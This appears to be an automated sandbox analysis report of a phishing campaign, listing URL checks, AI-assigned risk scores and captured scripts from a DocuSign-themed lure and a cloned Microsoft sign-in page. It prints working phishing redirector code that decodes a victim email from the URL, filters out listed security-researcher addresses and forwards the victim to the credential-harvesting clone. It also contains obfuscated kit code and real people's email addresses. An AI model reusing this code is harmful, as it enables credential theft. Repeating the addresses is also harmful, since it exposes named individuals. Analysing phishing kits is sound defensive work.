| URL: https://cc.naver.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://cc.naver.com |
| URL: https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The script demonstrates several high-risk behaviors, including obfuscated code, data exfiltration, and redirects to potentially malicious domains. While the script appears to have some legitimate functionality, such as email validation and blocking, the overall risk is elevated due to the suspicious redirection and the use of encoded strings."
} |
const replacements = {
"q07": "@",
"jx3": ".",
"z9B": "c",
"R15": "o",
"Lh6": "e",
"WPy": "m",
"vk8": "t",
"g4P": "i"
};
const blockedEmails = [
"mario@bancogroup.com.au",
"lhorne@aqualogic.com.au",
"vincenzo.zinni@fusinaproducts.com",
"raz.kc@telrad.com",
"razk@telrad.com",
"keith.isaac@seruminstitute.com",
"ulf.heitmueller@vng.de",
"gilles.feith@luxairgroup.lu"
];
function decryptEmail(encryptedEmail) {
return Object.entries(replacements).reduce(
(decrypted, [key, value]) => decrypted.split(key).join(value),
encryptedEmail
);
}
function isEmailBlocked(email) {
const lowerEmail = email.toLowerCase(); // Ensure case insensitivity
return blockedEmails.includes(lowerEmail);
}
function isValidEmailMatch(email) {
let replacementMatches = 0;
let totalReplacements = Object.keys(replacements).length;
// Count how many of the replacements match the email after decryption
Object.keys(replacements).forEach(key => {
if (email.includes(replacements[key])) {
replacementMatches++;
}
});
// If at least 50% of the replacements are matched, return true
const matchPercentage = (replacementMatches / totalReplacements) * 100;
return matchPercentage >= 50;
}
async function redirectToDomain() {
const hash = window.location.hash.substring(1); // Extract hash without '#'
const encodedEmail = decodeURIComponent(hash); // Decode the email from the hash
if (!encodedEmail) {
console.error("No email found in the URL hash.");
window.location.href = "https://www.404errorpages.com/error";
return;
}
const decryptedEmail = decryptEmail(encodedEmail);
// Check if the email is blocked or doesn't meet the 50% match criteria
if (isEmailBlocked(decryptedEmail) || !isValidEmailMatch(decryptedEmail)) {
console.warn(`Blocked or invalid email detected: ${decryptedEmail}`);
window.location.href = "https://www.404errorpages.com/error";
return;
}
// Proceed to redirection
console.log("Email is valid, proceeding with redirection.");
sessionStorage.setItem('email', decryptedEmail);
const randomToken = Math.random().toString(36).substring(2, 15);
const timestamp = Date.now();
const uuid = crypto.randomUUID();
// Create query parameters and ensure proper email formatting
const queryParams = new URLSearchParams({
sessionID: randomToken,
timestamp,
uuid,
username: decryptedEmail // Use plain email, not encoded
}).toString();
// Redirect after progress bar completes
setTimeout(() => {
window.location.href = `https://accounts.lccweb.org/?${queryParams}`;
}, 1500); // Matches the animation duration (5 seconds)
}
document.addEventListener('DOMContentLoaded', redirectToDomain);
|
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr&... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It uses dynamic code execution through the `eval` function, which can be a high-risk indicator if not used carefully. Additionally, the script appears to be heavily obfuscated, making it difficult to analyze the full extent of its functionality. While there are no clear indicators of data exfiltration or redirection to malicious domains, the overall complexity and lack of transparency in the code warrant further investigation."
} |
function a0K5(K,H){var X=a0K4();return a0K5=function(t,O){t=t-0x144;var D=X[t];return D;},a0K5(K,H);}(function(K,H){var tx=a0K5,X=K();while(!![]){try{var t=-parseInt(tx(0x313))/0x1*(parseInt(tx(0x2c3))/0x2)+parseInt(tx(0x227))/0x3+-parseInt(tx(0x548))/0x4*(-parseInt(tx(0x32f))/0x5)+parseInt(tx(0x199))/0x6*(parseInt(tx(0x4e0))/0x7)+-parseInt(tx(0x209))/0x8+-parseInt(tx(0x514))/0x9*(parseInt(tx(0x383))/0xa)+parseInt(tx(0x45c))/0xb*(parseInt(tx(0x4df))/0xc);if(t===H)break;else X['push'](X['shift']());}catch(O){X['push'](X['shift']());}}}(a0K4,0x4be1a),!(function(){var Mr=a0K5,K0=(function(){var XM=!![];return function(Xe,XN){var XE=XM?function(){var ts=a0K5;if('FWsEG'!==ts(0x1ec)){if(XN){var XL=XN[ts(0x464)](Xe,arguments);return XN=null,XL;}}else try{return!!Ku['sessionStorage'];}catch(XQ){return!0x0;}}:function(){};return XM=![],XE;};}()),K2=(function(){var XM=!![];return function(Xe,XN){var XE=XM?function(){var ty=a0K5;if(XN){var XL=XN[ty(0x464)](Xe,arguments);return XN=null,XL;}}:function(){};return XM=![],XE;};}());'use strict';var K4={0x1fb8:function(XM,Xe,XN){var tI=a0K5,XE=XN(0x5cb),XL=XN(0x2239),XW=TypeError;XM[tI(0x1e8)]=function(XQ){var tc=tI;if(XE(XQ))return XQ;throw new XW(XL(XQ)+tc(0x4fe));};},0x946:function(XM,Xe,XN){var tU=a0K5,XE=XN(0x3af),XL=XN(0x2239),XW=TypeError;XM[tU(0x1e8)]=function(XQ){var tm=tU;if(XE(XQ))return XQ;throw new XW(XL(XQ)+tm(0x416));};},0xf0c:function(XM,Xe,XN){var tA=a0K5,XE=XN(0x2df),XL=String,XW=TypeError;XM[tA(0x1e8)]=function(XQ){var th=tA;if(th(0x535)==='iinlp'){if(XE(XQ))return XQ;throw new XW('Can\x27t\x20set\x20'+XL(XQ)+th(0x51e));}else return Ku(th(0x255)[th(0x44b)](XQ,')'))[th(0x399)];};},0x1bb7:function(XM,Xe,XN){var tp=a0K5;if(tp(0x311)===tp(0x540)){if(Kr(Ko))return XE;throw new Kx(Ks(XN)+tp(0x241));}else{var XE=XN(0x1),XL=XN(0x14aa),XW=XN(0x16cb)['f'],XQ=XE('unscopables'),XT=Array[tp(0x208)];void 0x0===XT[XQ]&&XW(XT,XQ,{'configurable':!0x0,'value':XL(null)}),XM[tp(0x1e8)]=function(Xj){XT[XQ][Xj]=!0x0;};}},0x1143:function(XM,Xe,XN){var tk=a0K5,XE=XN(0x2391)['charAt'];XM[tk(0x1e8)]=function(XL,XW,XQ){var tY=tk;return XW+(XQ?XE(XL,XW)[tY(0x34a)]:0x1);};},0x1785:function(XM,Xe,XN){var tu=a0K5,XE=XN(0x12cf),XL=TypeError;XM[tu(0x1e8)]=function(XW,XQ){if(XE(XQ,XW))return XW;throw new XL('Incorrect\x20invocation');};},0x8f5:function(XM,Xe,XN){var tn=a0K5,XE=XN(0x6a8),XL=String,XW=TypeError;XM[tn(0x1e8)]=function(XQ){var tG=tn;if(XE(XQ))return XQ;throw new XW(XL(XQ)+tG(0x241));};},0x17fe:function(XM,Xe,XN){var tV=a0K5,XE=XN(0xb62),XL=XN(0x70f),XW=XN(0x92b),XQ=XN(0x22c5),XT=XN(0x14b3),Xl=XN(0x3af),Xj=XN(0x1b30),Xz=XN(0x29e),Xa=XN(0x1317),Xi=XN(0x1a09),XR=Array;XM[tV(0x1e8)]=function(XF){var tZ=tV,Xo=XW(XF),Xf=Xl(this),Xx=arguments['length'],Xs=Xx>0x1?arguments[0x1]:void 0x0,Xy=void 0x0!==Xs;Xy&&(Xs=XE(Xs,Xx>0x2?arguments[0x2]:void 0x0));var XI,Xc,XU,Xm,XA,Xh,Xp=Xi(Xo),Xk=0x0;if(!Xp||this===XR&&XT(Xp)){for(XI=Xj(Xo),Xc=Xf?new this(XI):XR(XI);XI>Xk;Xk++)Xh=Xy?Xs(Xo[Xk],Xk):Xo[Xk],Xz(Xc,Xk,Xh);}else{for(Xc=Xf?new this():[],XA=(Xm=Xa(Xo,Xp))[tZ(0x552)];!(XU=XL(XA,Xm))[tZ(0x301)];Xk++)Xh=Xy?XQ(Xm,Xs,[XU[tZ(0x545)],Xk],!0x0):XU[tZ(0x545)],Xz(Xc,Xk,Xh);}return Xc[tZ(0x34a)]=Xk,Xc;};},0x19fb:function(XM,Xe,XN){var XE=XN(0x15df),XL=XN(0xd40),XW=XN(0x1b30),XQ=function(XT){var tb=a0K5;if(tb(0x247)===tb(0x1ea))switch(KO['label']){case 0x0:K4=K5(K6[tb(0x34a)]),K7=K8['now'](),K9=0x0,KK[tb(0x560)]=0x1;case 0x1:return KH<KX[tb(0x34a)]?(Hn[KO]=KD(Kv[KP],Kr),(KC=KM[tb(0x25d)]())>=Ke+KN?(KE=KL,[0x4,new KW(function(Xj){var tB=tb,Xz=new Ka();Xz[tB(0x3cc)][tB(0x518)]=function(){return Xj();},Xz[tB(0x3c1)]['postMessage'](null);})]):[0x3,0x3]):[0x3,0x4];case 0x2:KT[tb(0x3b5)](),Kl[tb(0x560)]=0x3;case 0x3:return++Kj,[0x3,0x1];case 0x4:return[0x2,Kz];}else return function(Xj,Xz,Xa){var Xi=XE(Xj),XR=XW(Xi);if(0x0===XR)return!XT&&-0x1;var XF,Xo=XL(Xa,XR);if(XT&&Xz!=Xz){for(;XR>Xo;)if((XF=Xi[Xo++])!=XF)return!0x0;}else{for(;XR>Xo;Xo++)if((XT||Xo in Xi)&&Xi[Xo]===Xz)return XT||Xo||0x0;}return!XT&&-0x1;};};XM['exports']= |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr&... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "This JavaScript snippet exhibits several behaviors that raise moderate security concerns. It uses dynamic code execution through the `Function` constructor, which can be a high-risk indicator. Additionally, it sends data to external domains, which could potentially lead to data exfiltration. While the intent of the script is not entirely clear, the combination of these behaviors warrants further investigation and a medium-risk score."
} |
!function(){"use strict";var t=function(r,e){return t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,r){t.__proto__=r}||function(t,r){for(var e in r)Object.prototype.hasOwnProperty.call(r,e)&&(t[e]=r[e])},t(r,e)};function r(r,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function n(){this.constructor=r}t(r,e),r.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}function e(t,r,e,n){return new(e||(e=Promise))((function(o,i){function u(t){try{s(n.next(t))}catch(t){i(t)}}function c(t){try{s(n.throw(t))}catch(t){i(t)}}function s(t){var r;t.done?o(t.value):(r=t.value,r instanceof e?r:new e((function(t){t(r)}))).then(u,c)}s((n=n.apply(t,r||[])).next())}))}function n(t,r){var e,n,o,i,u={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return i={next:c(0),throw:c(1),return:c(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function c(c){return function(s){return function(c){if(e)throw new TypeError("Generator is already executing.");for(;i&&(i=0,c[0]&&(u=0)),u;)try{if(e=1,n&&(o=2&c[0]?n.return:c[0]?n.throw||((o=n.return)&&o.call(n),0):n.next)&&!(o=o.call(n,c[1])).done)return o;switch(n=0,o&&(c=[2&c[0],o.value]),c[0]){case 0:case 1:o=c;break;case 4:return u.label++,{value:c[1],done:!1};case 5:u.label++,n=c[1],c=[0];continue;case 7:c=u.ops.pop(),u.trys.pop();continue;default:if(!(o=u.trys,(o=o.length>0&&o[o.length-1])||6!==c[0]&&2!==c[0])){u=0;continue}if(3===c[0]&&(!o||c[1]>o[0]&&c[1]<o[3])){u.label=c[1];break}if(6===c[0]&&u.label<o[1]){u.label=o[1],o=c;break}if(o&&u.label<o[2]){u.label=o[2],u.ops.push(c);break}o[2]&&u.ops.pop(),u.trys.pop();continue}c=r.call(t,u)}catch(t){c=[6,t],n=0}finally{e=o=0}if(5&c[0])throw c[1];return{value:c[0]?c[1]:void 0,done:!0}}([c,s])}}}Object.create;function o(t){var r="function"==typeof Symbol&&Symbol.iterator,e=r&&t[r],n=0;if(e)return e.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&n>=t.length&&(t=void 0),{value:t&&t[n++],done:!t}}};throw new TypeError(r?"Object is not iterable.":"Symbol.iterator is not defined.")}function i(t,r){var e="function"==typeof Symbol&&t[Symbol.iterator];if(!e)return t;var n,o,i=e.call(t),u=[];try{for(;(void 0===r||r-- >0)&&!(n=i.next()).done;)u.push(n.value)}catch(t){o={error:t}}finally{try{n&&!n.done&&(e=i.return)&&e.call(i)}finally{if(o)throw o.error}}return u}function u(t,r,e){if(e||2===arguments.length)for(var n,o=0,i=r.length;o<i;o++)!n&&o in r||(n||(n=Array.prototype.slice.call(r,0,o)),n[o]=r[o]);return t.concat(n||Array.prototype.slice.call(r))}function c(t){return this instanceof c?(this.v=t,this):new c(t)}function s(t,r,e){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var n,o=e.apply(t,r||[]),i=[];return n={},u("next"),u("throw"),u("return",(function(t){return function(r){return Promise.resolve(r).then(t,l)}})),n[Symbol.asyncIterator]=function(){return this},n;function u(t,r){o[t]&&(n[t]=function(r){return new Promise((function(e,n){i.push([t,r,e,n])>1||s(t,r)}))},r&&(n[t]=r(n[t])))}function s(t,r){try{(e=o[t](r)).value instanceof c?Promise.resolve(e.value.v).then(a,l):f(i[0][2],e)}catch(t){f(i[0][3],t)}var e}function a(t){s("next",t)}function l(t){s("throw",t)}function f(t,r){t(r),i.shift(),i.length&&s(i[0][0],i[0][1])}}function a(t){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var r,e=t[Symbol.asyncIterator];return e?e.call(t):(t=o(t),r={},n("next"),n("throw"),n("return"),r[Symbol.asyncIterator]=function(){return this},r);function n(e){r[e]=t[e]&&function(r){return new Promise((function(n,o){(function(t,r,e,n){Promise.resolve(n).then((function(r){t({value:r,done:e})}),r)})(n,o,(r=t[e](r)).done,r.value)}))}}}Object.create;"function"==typeof SuppressedError&&SuppressedError;function l(t){return"function"==typeof t}var f,h=((f=function(t){return function(r){t(this),this.message=r?r.length+" errors oc |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr&... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. While it does not exhibit any high-risk indicators like dynamic code execution or data exfiltration, it includes several moderate-risk indicators such as external data transmission, the use of fallback domains, and aggressive DOM manipulation. Additionally, the script interacts with domains that are not immediately recognizable as trusted, which adds to the overall risk. Further review and analysis would be necessary to determine the full context and intent of this script."
} |
//< |
| URL: https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPy Model: Joe Sandbox AI | {
"brands": [
"Docusign"
]
} |
|
| URL: https://prestamosgarantizados.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://prestamosgarantizados.com |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr&... Model: Joe Sandbox AI | ```json
{
"risk_score": 2,
"reasoning": "The script contains legacy practices such as using outdated event handling methods like `attachEvent` and `detachEvent`, which are considered low-risk indicators. There is no evidence of dynamic code execution, data exfiltration, or interaction with suspicious domains. The script appears to be focused on DOM event handling and logging, with no clear malicious intent."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("name","")),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr&... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates moderate-risk behaviors, including redirecting the user to a potentially untrusted domain and modifying the URL with query parameters. While the intent is not entirely clear, the script's behavior raises concerns and requires further investigation."
} |
//<![CDATA[
!function(){var e=window,s=e.document,i=e.$Config||{};if(true){s&&s.body&&(s.body.style.display="block")}else if(false){var o,t,r,f,n,d;if(i.fAddTryCatchForIFrameRedirects){try{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}catch(e){}}else{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",
o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}}}();
//
|
| URL: https://e175ea74-3c950dd3.lccweb.org/shared/1.0/co... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. However, it also includes some behaviors that warrant further review, such as the use of dynamic code execution (via `setTimeout`) and potential data exfiltration (sending data to external domains). Additionally, the script is obfuscated, which increases the risk. Overall, the script exhibits a mix of low-risk and moderate-risk indicators, resulting in a medium risk score."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.lccweb.org/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t, |
| URL: https://accounts.lccweb.org/?sessionID=q6nrva3dnr&... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a configuration object for a web application. It contains various URLs and settings related to user authentication and federated identity management. While the snippet does not exhibit any high-risk behaviors, it does include some moderate-risk indicators, such as external data transmission to third-party domains. Additionally, the use of obfuscated URLs and the presence of multiple fallback domains raise some concerns. Overall, the script requires further review to ensure the legitimacy of the domains and the transparency of the data transmission."
} |
//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://l1ve.lccweb.org/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2faccounts.lccweb.org%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAR-_hP6EhDF7tmbESUm_1xVeBYjZ3xOZhlY5SpGZcLG6V9gZHzByDiJSaK4JLUsNU8vJ7UsM8-hsDQzpyS1CKTiFpOgf1G6Z0p4sVtqSmpRYklmft4jZpzKL7AIvGLhMWC24uDgEmCQYFBg-MHCuIgV6NbJ23omT1tu7LC5v2BeslwBwylW_eKIQpPc0kRvr_xcrzJfyxwXf3fX0ESPwuyKlArtbEvL8vywCpN074r08HRbYyvDCWxCE9iYTrExfGBj7GBnmMXOcICTcQMP4wFehh9862b2XJx__fg7j1f8OhGRfkZZ5l4hARnaSUX5zm4eGYaJfoUp5llFFpa5wVlBZRZlkQGp7hEhbha2GwQYHggwAAA1\u0026login_hint=steven.levin%40quilter.com\u0026estsfed=1\u0026uaid=f412fef95a5049078d685a161fe72513\u0026signup=1\u0026lw=1\u0026fl=easi2\u0026fci=https%3a%2f%2fc0d4d58b-3c950dd3.lccweb.org","urlMsaLogout":"https://l1ve.lccweb.org/logout.srf?iframed_by=https%3a%2f%2faccounts.lccweb.org","urlOtherIdpForget":"https://l1ve.lccweb.org/forgetme.srf?iframed_by=https%3a%2f%2faccounts.lccweb.org","showCantAccessAccountLink":true,"urlGitHubFed":"https://l1ve.lccweb.org/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2faccounts.lccweb.org%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAR-_hP6EhDF7tmbESUm_1xVeBYjZ3xOZhlY5SpGZcLG6V9gZHzByDiJSaK4JLUsNU8vJ7UsM8-hsDQzpyS1CKTiFpOgf1G6Z0p4sVtqSmpRYklmft4jZpzKL7AIvGLhMWC24uDgEmCQYFBg-MHCuIgV6NbJ23omT1tu7LC5v2BeslwBwylW_eKIQpPc0kRvr_xcrzJfyxwXf3fX0ESPwuyKlArtbEvL8vywCpN074r08HRbYyvDCWxCE9iYTrExfGBj7GBnmMXOcICTcQMP4wFehh9862b2XJx__fg7j1f8OhGRfkZZ5l4hARnaSUX5zm4eGYaJfoUp5llFFpa5wVlBZRZlkQGp7hEhbha2GwQYHggwAAA1\u0026login_hint=steven.levin%40quilter.com\u0026estsfed=1\u0026uaid=f412fef95a5049078d685a161fe72513\u0026fci=https%3a%2f%2fc0d4d58b-3c950dd3.lccweb.org\u0026idp_hint=github.lccweb.org","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~246!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African 